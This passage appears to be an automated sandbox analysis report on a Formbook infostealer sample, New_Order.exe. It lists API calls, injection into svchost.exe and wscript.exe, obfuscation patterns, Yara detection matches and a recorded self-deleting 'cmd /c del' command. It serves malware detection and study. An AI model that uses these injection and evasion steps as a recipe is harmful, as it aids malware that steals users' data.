Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039695D0 NtClose,LdrInitializeThunk,	1_2_039695D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969540 NtReadFile,LdrInitializeThunk,	1_2_03969540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396A3B0 NtGetContextThread,	1_2_0396A3B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969B00 NtSetValueKey,	1_2_03969B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969A80 NtOpenDirectoryObject,	1_2_03969A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969A10 NtQuerySection,	1_2_03969A10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039699D0 NtCreateProcessEx,	1_2_039699D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969950 NtQueueApcThread,	1_2_03969950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039698A0 NtWriteVirtualMemory,	1_2_039698A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969820 NtEnumerateKey,	1_2_03969820
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396B040 NtSuspendThread,	1_2_0396B040
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396A710 NtOpenProcessToken,	1_2_0396A710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969730 NtQueryVirtualMemory,	1_2_03969730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969770 NtSetInformationFile,	1_2_03969770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396A770 NtOpenThread,	1_2_0396A770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969760 NtOpenProcess,	1_2_03969760
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039696D0 NtCreateKey,	1_2_039696D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969610 NtEnumerateValueKey,	1_2_03969610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969650 NtQueryValueKey,	1_2_03969650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969670 NtQueryInformationProcess,	1_2_03969670
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039695F0 NtQueryInformationFile,	1_2_039695F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396AD30 NtSetContextThread,	1_2_0396AD30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969520 NtWaitForSingleObject,	1_2_03969520
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969560 NtWriteFile,	1_2_03969560
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9840 NtDelayExecution,LdrInitializeThunk,	7_2_048A9840
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9860 NtQuerySystemInformation,LdrInitializeThunk,	7_2_048A9860
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A99A0 NtCreateSection,LdrInitializeThunk,	7_2_048A99A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A95D0 NtClose,LdrInitializeThunk,	7_2_048A95D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	7_2_048A9910
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9540 NtReadFile,LdrInitializeThunk,	7_2_048A9540
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A96D0 NtCreateKey,LdrInitializeThunk,	7_2_048A96D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A96E0 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_048A96E0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9650 NtQueryValueKey,LdrInitializeThunk,	7_2_048A9650
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9A50 NtCreateFile,LdrInitializeThunk,	7_2_048A9A50
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9660 NtAllocateVirtualMemory,LdrInitializeThunk,	7_2_048A9660
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9780 NtMapViewOfSection,LdrInitializeThunk,	7_2_048A9780
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9FE0 NtCreateMutant,LdrInitializeThunk,	7_2_048A9FE0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9710 NtQueryInformationToken,LdrInitializeThunk,	7_2_048A9710
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A98A0 NtWriteVirtualMemory,	7_2_048A98A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A98F0 NtReadVirtualMemory,	7_2_048A98F0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9820 NtEnumerateKey,	7_2_048A9820
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048AB040 NtSuspendThread,	7_2_048AB040
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A99D0 NtCreateProcessEx,	7_2_048A99D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A95F0 NtQueryInformationFile,	7_2_048A95F0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9520 NtWaitForSingleObject,	7_2_048A9520
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048AAD30 NtSetContextThread,	7_2_048AAD30
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9950 NtQueueApcThread,	7_2_048A9950
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9560 NtWriteFile,	7_2_048A9560
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9A80 NtOpenDirectoryObject,	7_2_048A9A80
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9A00 NtProtectVirtualMemory,	7_2_048A9A00
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9610 NtEnumerateValueKey,	7_2_048A9610
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9A10 NtQuerySection,	7_2_048A9A10
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9A20 NtResumeThread,	7_2_048A9A20
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9670 NtQueryInformationProcess,	7_2_048A9670
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A97A0 NtUnmapViewOfSection,	7_2_048A97A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048AA3B0 NtGetContextThread,	7_2_048AA3B0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9B00 NtSetValueKey,	7_2_048A9B00
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048AA710 NtOpenProcessToken,	7_2_048AA710
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9730 NtQueryVirtualMemory,	7_2_048A9730
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9760 NtOpenProcess,	7_2_048A9760
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9770 NtSetInformationFile,	7_2_048A9770
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048AA770 NtOpenThread,	7_2_048AA770
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_006281C0 NtCreateFile,	7_2_006281C0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_00628270 NtReadFile,	7_2_00628270
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_006282F0 NtClose,	7_2_006282F0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_006283A0 NtAllocateVirtualMemory,	7_2_006283A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_006281BA NtCreateFile,	7_2_006281BA
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_006282EA NtClose,	7_2_006282EA
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0062839B NtAllocateVirtualMemory,	7_2_0062839B

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\New_Order.exe

Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_00403348

Detected potential crypto function

Source: C:\Users\user\Desktop\New_Order.exe	Code function: 0_2_00406945	0_2_00406945
Source: C:\Users\user\Desktop\New_Order.exe	Code function: 0_2_0040711C	0_2_0040711C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00401030	1_2_00401030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041BA5D	1_2_0041BA5D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041C34C	1_2_0041C34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00408C60	1_2_00408C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041B4A3	1_2_0041B4A3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402D90	1_2_00402D90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402FB0	1_2_00402FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395EBB0	1_2_0395EBB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E03DA	1_2_039E03DA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039EDBD2	1_2_039EDBD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F2B28	1_2_039F2B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394AB40	1_2_0394AB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F22AE	1_2_039F22AE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039DFA2B	1_2_039DFA2B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392F900	1_2_0392F900
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03944120	1_2_03944120
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393B090	1_2_0393B090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039520A0	1_2_039520A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F20A8	1_2_039F20A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F28EC	1_2_039F28EC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E1002	1_2_039E1002
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039FE824	1_2_039FE824
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039FDFCE	1_2_039FDFCE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F1FF1	1_2_039F1FF1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F2EF7	1_2_039F2EF7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039ED616	1_2_039ED616
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03946E30	1_2_03946E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03952581	1_2_03952581
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F25DD	1_2_039F25DD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393D5E0	1_2_0393D5E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F2D07	1_2_039F2D07
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03920D20	1_2_03920D20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F1D55	1_2_039F1D55
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393841F	1_2_0393841F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039ED466	1_2_039ED466
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0487B090	7_2_0487B090
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048920A0	7_2_048920A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_049320A8	7_2_049320A8
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04921002	7_2_04921002
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0487841F	7_2_0487841F
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04892581	7_2_04892581
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0487D5E0	7_2_0487D5E0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0486F900	7_2_0486F900
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04932D07	7_2_04932D07
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04860D20	7_2_04860D20
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04884120	7_2_04884120
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04931D55	7_2_04931D55
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_049322AE	7_2_049322AE
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04932EF7	7_2_04932EF7
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04886E30	7_2_04886E30
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0489EBB0	7_2_0489EBB0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04931FF1	7_2_04931FF1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04932B28	7_2_04932B28
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0062BA5D	7_2_0062BA5D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0062C34C	7_2_0062C34C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_00618C60	7_2_00618C60
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0062B4A3	7_2_0062B4A3
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_00612D90	7_2_00612D90
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_00612FB0	7_2_00612FB0

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0392B150 appears 48 times
Source: C:\Windows\SysWOW64\wscript.exe	Code function: String function: 0486B150 appears 35 times

PE file contains strange resources

Source: New_Order.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Sample file is different than original file name gathered from version info

Source: New_Order.exe, 00000000.00000003.233299812.0000000002C3F000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs New_Order.exe
Source: New_Order.exe, 00000000.00000002.240312486.0000000002480000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs New_Order.exe

Uses 32bit PE files

Source: New_Order.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Yara signature match

Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/3@13/8

Source: C:\Users\user\Desktop\New_Order.exe

0_2_00403348

Source: C:\Users\user\Desktop\New_Order.exe

Code function: 0_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_0040460D

Source: C:\Users\user\Desktop\New_Order.exe

Code function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,

0_2_0040216B

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6848:120:WilError_01

Source: C:\Users\user\Desktop\New_Order.exe

File created: C:\Users\user\AppData\Local\Temp\nsmC33E.tmp

Jump to behavior

Source: New_Order.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\New_Order.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\New_Order.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: New_Order.exe	Virustotal: Detection: 38%
Source: New_Order.exe	ReversingLabs: Detection: 59%

Source: C:\Users\user\Desktop\New_Order.exe

File read: C:\Users\user\Desktop\New_Order.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\New_Order.exe 'C:\Users\user\Desktop\New_Order.exe'
Source: C:\Users\user\Desktop\New_Order.exe	Process created: C:\Windows\SysWOW64\svchost.exe 'C:\Users\user\Desktop\New_Order.exe'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\svchost.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\New_Order.exe	Process created: C:\Windows\SysWOW64\svchost.exe 'C:\Users\user\Desktop\New_Order.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\svchost.exe'	Jump to behavior

Source: C:\Users\user\Desktop\New_Order.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: New_Order.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wscript.pdbGCTL source: svchost.exe, 00000001.00000002.278512625.0000000003890000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000002.510158064.0000000007180000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: New_Order.exe, 00000000.00000003.230980266.0000000002AF0000.00000004.00000001.sdmp, svchost.exe, 00000001.00000003.237522923.0000000003700000.00000004.00000001.sdmp, wscript.exe, 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: New_Order.exe, 00000000.00000003.230980266.0000000002AF0000.00000004.00000001.sdmp, svchost.exe, wscript.exe
Source:	Binary string: wscript.pdb source: svchost.exe, 00000001.00000002.278512625.0000000003890000.00000040.00000001.sdmp
Source:	Binary string: svchost.pdb source: wscript.exe, 00000007.00000002.497952984.0000000004D77000.00000004.00000001.sdmp
Source:	Binary string: svchost.pdbUGP source: wscript.exe, 00000007.00000002.497952984.0000000004D77000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000002.00000002.510158064.0000000007180000.00000002.00000001.sdmp

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00410109 push eax; iretd	1_2_0041010B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041A2F2 push es; ret	1_2_0041A337
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00415BFC push ss; ret	1_2_00415BFD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041B3B5 push eax; ret	1_2_0041B408
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041B46C push eax; ret	1_2_0041B472
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041B402 push eax; ret	1_2_0041B408
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041B40B push eax; ret	1_2_0041B472
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004154D4 push ss; iretd	1_2_004154DC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00413E26 pushfd ; iretd	1_2_00413E27
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00414EC1 push es; retf	1_2_00414EC2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0397D0D1 push ecx; ret	1_2_0397D0E4
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048BD0D1 push ecx; ret	7_2_048BD0E4
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_00620109 push eax; iretd	7_2_0062010B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0062A2F2 push es; ret	7_2_0062A337
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_00625BFC push ss; ret	7_2_00625BFD
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0062B3B5 push eax; ret	7_2_0062B408
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0062B46C push eax; ret	7_2_0062B472
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0062B402 push eax; ret	7_2_0062B408
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0062B40B push eax; ret	7_2_0062B472
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_006254D4 push ss; iretd	7_2_006254DC
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_00623E26 pushfd ; iretd	7_2_00623E27
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_00624EC1 push es; retf	7_2_00624EC2

Persistence and Installation Behavior:

Drops PE files

